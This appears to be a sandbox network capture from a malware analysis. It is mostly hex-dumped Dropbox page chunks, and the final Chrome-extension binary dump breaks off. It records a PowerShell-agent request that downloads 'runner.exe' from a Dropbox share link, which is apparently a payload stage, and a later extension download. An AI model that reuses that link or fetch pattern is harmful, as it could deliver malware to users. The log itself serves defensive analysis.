nofollow, noimageindex X-Xss-Protection: 1; mode=block Date: Sat, 28 Dec 2024 08:45:33 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 18b08ee10c1c404fb5dcea371a2b237b Connection: close Transfer-Encoding: chunked
2024-12-28 08:45:33 UTC	595	IN	Data Raw: 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6d 61 65 73 74 72 6f 20 67 6c 6f 62 61 6c 2d 68 65 61 64 65 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0d 0a 36 0d 0a 3c 68 65 61 64 3e 0d 0a 31 39 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 0d 0a 34 31 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6d 61 67 65 69 6e 64 65 78 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 2f 3e 0a 0d 0a 34 37 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 64<!DOCTYPE html><html class="maestro global-header" xmlns="http://www.w3.org/1999/xhtml" lang="en">6<head>19<meta charset="utf-8" />41<meta content="noindex, nofollow, noimageindex" name="robots" />47<meta content="width=device-widt
2024-12-28 08:45:33 UTC	2325	IN	Data Raw: 64 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 79 70 65 73 63 72 69 70 74 2f 63 6f 6d 70 6f 6e 65 6e 74 5f 6c 69 62 72 61 72 69 65 73 2f 64 77 67 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2f 73 72 63 2f 69 6e 64 65 78 2e 77 65 62 2d 76 66 6c 32 66 54 32 48 63 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 63 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c Data Ascii: d0<link rel="preload" href="https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl2fT2Hc.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>bc<link rel="preload" href="https://cfl
2024-12-28 08:45:33 UTC	2081	IN	Data Raw: 62 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 66 6f 75 6e 64 61 74 69 6f 6e 2d 76 66 6c 48 36 77 77 77 76 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 34 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d Data Ascii: b5<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>b4<link rel="preload" href="https://cfl.dropboxstatic.com/static/m
2024-12-28 08:45:33 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 7a 78 4f 6e 6e 32 6b 34 4f 45 42 7a 62 2f 49 70 46 44 26 23 34 33 3b 48 5a 66 31 74 70 36 38 3d 22 3e 77 69 6e 64 6f 77 2e 5f 5f 53 45 52 56 45 44 5f 42 59 5f 45 44 49 53 4f 4e 5f 57 45 42 5f 53 45 52 56 45 52 5f 5f 20 3d 20 74 72 75 65 3b 0a 76 61 72 20 72 65 71 75 69 72 65 43 6f 6e 66 69 67 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 22 2c 20 22 77 61 69 74 53 65 63 6f 6e 64 73 22 3a 20 33 30 2c 20 22 70 61 74 68 73 22 3a 20 7b 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 62 75 73 65 5f 66 Data Ascii: 1000<script nonce="zxOnn2k4OEBzb/IpFD+HZf1tp68=">window.__SERVED_BY_EDISON_WEB_SERVER__ = true;var requireConfig = {"baseUrl": "https://cfl.dropboxstatic.com/", "waitSeconds": 30, "paths": {"atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_abuse_f
2024-12-28 08:45:34 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 6f 6e 73 5f 64 6f 77 6e 6c 6f 61 64 5f 61 70 70 5f 6d 6f 64 61 6c 5f 6d 6f 64 61 6c 2d 76 66 6c 6e 6c 70 32 61 47 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 76 61 74 69 6f 6e 5f 64 61 74 61 5f 73 6c 69 63 65 73 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 76 61 74 69 6f Data Ascii: 4000": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_actions_download_app_modal_modal-vflnlp2aG", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_activation_data_slices": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_activatio
2024-12-28 08:45:34 UTC	8	IN	Data Raw: 65 5f 66 69 6c 65 0d 0a Data Ascii: e_file
2024-12-28 08:45:34 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 61 73 68 5f 75 70 73 65 6c 6c 5f 73 65 61 72 63 68 5f 62 61 72 5f 75 70 73 65 6c 6c 5f 64 61 73 68 5f 6d 6f 64 61 6c 5f 6c 6f 74 74 69 65 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 61 73 68 5f 75 70 73 65 6c 6c 5f 73 65 61 72 63 68 5f 62 61 72 5f 75 70 73 65 6c 6c 5f 64 61 73 68 5f 6d 6f 64 61 6c 5f 6c 6f 74 74 69 65 2d 76 66 6c 66 58 4a 32 7a 71 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 61 73 68 5f 75 70 73 65 6c 6c Data Ascii: 4000_bundle_amd/dist/c_dash_upsell_search_bar_upsell_dash_modal_lottie": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dash_upsell_search_bar_upsell_dash_modal_lottie-vflfXJ2zq", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dash_upsell
2024-12-28 08:45:34 UTC	16384	IN	Data Raw: 6c 65 5f 61 6d 64 0d 0a 34 30 30 30 0d 0a 2f 64 69 73 74 2f 63 5f 64 72 6f 70 69 6e 73 5f 76 33 5f 73 68 61 72 65 64 5f 66 69 6c 65 5f 66 6f 6c 64 65 72 5f 69 63 6f 6e 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 72 6f 70 69 6e 73 5f 76 33 5f 73 68 61 72 65 64 5f 66 69 6c 65 5f 66 6f 6c 64 65 72 5f 69 63 6f 6e 2d 76 66 6c 4c 4f 65 51 4b 31 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 72 6f 70 69 6e 73 5f 76 33 5f 73 68 61 72 65 64 5f 68 69 67 68 6c 69 67 68 74 61 62 6c 65 5f 66 69 6c 65 6e 61 6d 65 Data Ascii: le_amd4000/dist/c_dropins_v3_shared_file_folder_icon": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dropins_v3_shared_file_folder_icon-vflLOeQK1", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dropins_v3_shared_highlightable_filename
2024-12-28 08:45:34 UTC	16	IN	Data Raw: 64 65 78 2d 76 66 6c 68 76 73 58 42 79 22 0d 0a Data Ascii: dex-vflhvsXBy"
2024-12-28 08:45:34 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 69 6e 74 65 67 72 61 74 69 6f 6e 73 5f 63 61 6e 76 61 73 5f 75 70 6c 6f 61 64 5f 74 6f 5f 63 61 6e 76 61 73 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 69 6e 74 65 67 72 61 74 69 6f 6e 73 5f 63 61 6e 76 61 73 5f 75 70 6c 6f 61 64 5f 74 6f 5f 63 61 6e 76 61 73 2d 76 66 6c 51 70 69 35 47 6a 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 Data Ascii: 4000, "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_integrations_canvas_upload_to_canvas": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_integrations_canvas_upload_to_canvas-vflQpi5Gj", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:45:39 UTC	212	OUT	GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com
2024-12-28 08:45:39 UTC	3872	IN	HTTP/1.1 200 OK Content-Security-Policy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ [TRUNCATED] Content-Type: text/html; charset=utf-8 Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MjEzNjM3NjgzMzQ2OTg1NzgzMzk1NjA3OTc2OTIxNDkwNTkxODkz; Path=/; Expires=Thu, 27 Dec 2029 08:45:39 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=AOPar4yT5qd8xt-x3XbFRX_1; Path=/; Domain=dropbox.com; Expires=Sun, 28 Dec 2025 08:45:39 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=AOPar4yT5qd8xt-x3XbFRX_1; Path=/; Expires=Sun, 28 Dec 2025 08:45:39 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=V0M7E0l1Ls; Path=/; Expires=Sun, 28 Dec 2025 08:45:39 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Thu, 27 Dec 2029 08:45:39 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Date: Sat, 28 Dec 2024 08:45:39 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: fc28f10b96f8482db46c452743f8ce47 Connection: close Transfer-Encoding: chunked
2024-12-28 08:45:39 UTC	1186	IN	Data Raw: 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6d 61 65 73 74 72 6f 20 67 6c 6f 62 61 6c 2d 68 65 61 64 65 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0d 0a 36 0d 0a 3c 68 65 61 64 3e 0d 0a 31 39 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 0d 0a 34 31 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6d 61 67 65 69 6e 64 65 78 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 2f 3e 0a 0d 0a 34 37 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 64<!DOCTYPE html><html class="maestro global-header" xmlns="http://www.w3.org/1999/xhtml" lang="en">6<head>19<meta charset="utf-8" />41<meta content="noindex, nofollow, noimageindex" name="robots" />47<meta content="width=device-widt
2024-12-28 08:45:39 UTC	7911	IN	Data Raw: 64 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 79 70 65 73 63 72 69 70 74 2f 63 6f 6d 70 6f 6e 65 6e 74 5f 6c 69 62 72 61 72 69 65 73 2f 64 77 67 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2f 73 72 63 2f 69 6e 64 65 78 2e 77 65 62 2d 76 66 6c 32 66 54 32 48 63 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 63 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c Data Ascii: d0<link rel="preload" href="https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl2fT2Hc.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>c0<link rel="preload" href="https://cfl
2024-12-28 08:45:40 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 6f 6e 73 5f 64 6f 77 6e 6c 6f 61 64 5f 61 70 70 5f 6d 6f 64 61 6c 5f 6d 6f 64 61 6c 2d 76 66 6c 6e 6c 70 32 61 47 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 76 61 74 69 6f 6e 5f 64 61 74 61 5f 73 6c 69 63 65 73 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 76 61 74 69 6f 6e 5f 64 61 Data Ascii: 4000static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_actions_download_app_modal_modal-vflnlp2aG", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_activation_data_slices": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_activation_da
2024-12-28 08:45:40 UTC	8	IN	Data Raw: 6c 65 5f 62 75 6e 0d 0a Data Ascii: le_bun
2024-12-28 08:45:40 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 61 73 68 5f 75 70 73 65 6c 6c 5f 73 65 61 72 63 68 5f 62 61 72 5f 75 70 73 65 6c 6c 5f 64 61 73 68 5f 6d 6f 64 61 6c 5f 6c 6f 74 74 69 65 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 61 73 68 5f 75 70 73 65 6c 6c 5f 73 65 61 72 63 68 5f 62 61 72 5f 75 70 73 65 6c 6c 5f 64 61 73 68 5f 6d 6f 64 61 6c 5f 6c 6f 74 74 69 65 2d 76 66 6c 66 58 4a 32 7a 71 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 61 73 68 5f 75 70 73 65 6c 6c 5f 73 65 61 Data Ascii: 4000dle_amd/dist/c_dash_upsell_search_bar_upsell_dash_modal_lottie": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dash_upsell_search_bar_upsell_dash_modal_lottie-vflfXJ2zq", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dash_upsell_sea
2024-12-28 08:45:40 UTC	8	IN	Data Raw: 6d 64 2f 64 69 73 0d 0a Data Ascii: md/dis
2024-12-28 08:45:40 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 74 2f 63 5f 64 72 6f 70 69 6e 73 5f 76 33 5f 73 68 61 72 65 64 5f 66 69 6c 65 5f 66 6f 6c 64 65 72 5f 69 63 6f 6e 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 72 6f 70 69 6e 73 5f 76 33 5f 73 68 61 72 65 64 5f 66 69 6c 65 5f 66 6f 6c 64 65 72 5f 69 63 6f 6e 2d 76 66 6c 4c 4f 65 51 4b 31 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 64 72 6f 70 69 6e 73 5f 76 33 5f 73 68 61 72 65 64 5f 68 69 67 68 6c 69 67 68 74 61 62 6c 65 5f 66 69 6c 65 6e 61 6d 65 5f 74 65 78 74 22 3a 20 22 73 74 61 Data Ascii: 4000t/c_dropins_v3_shared_file_folder_icon": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dropins_v3_shared_file_folder_icon-vflLOeQK1", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dropins_v3_shared_highlightable_filename_text": "sta
2024-12-28 08:45:40 UTC	8	IN	Data Raw: 79 22 2c 20 22 61 0d 0a Data Ascii: y", "a
2024-12-28 08:45:40 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 69 6e 74 65 67 72 61 74 69 6f 6e 73 5f 63 61 6e 76 61 73 5f 75 70 6c 6f 61 64 5f 74 6f 5f 63 61 6e 76 61 73 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 69 6e 74 65 67 72 61 74 69 6f 6e 73 5f 63 61 6e 76 61 73 5f 75 70 6c 6f 61 64 5f 74 6f 5f 63 61 6e 76 61 73 2d 76 66 6c 51 70 69 35 47 6a 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 69 6e 74 Data Ascii: 4000tlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_integrations_canvas_upload_to_canvas": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_integrations_canvas_upload_to_canvas-vflQpi5Gj", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_int
2024-12-28 08:45:40 UTC	8	IN	Data Raw: 2f 61 74 6c 61 73 0d 0a Data Ascii: /atlas

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:45:47 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-28 08:45:48 UTC	563	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 154477 X-GUploader-UploadID: AFiumC6L1ybWhUKHa8YZ5RJpdp6JQFQLK8jKsm8ZE5Fqa8oeeGegQoYu_Vn2un0-2p7w7-G2 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Fri, 27 Dec 2024 15:58:14 GMT Expires: Sat, 27 Dec 2025 15:58:14 GMT Cache-Control: public, max-age=31536000 Age: 60454 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-28 08:45:48 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data 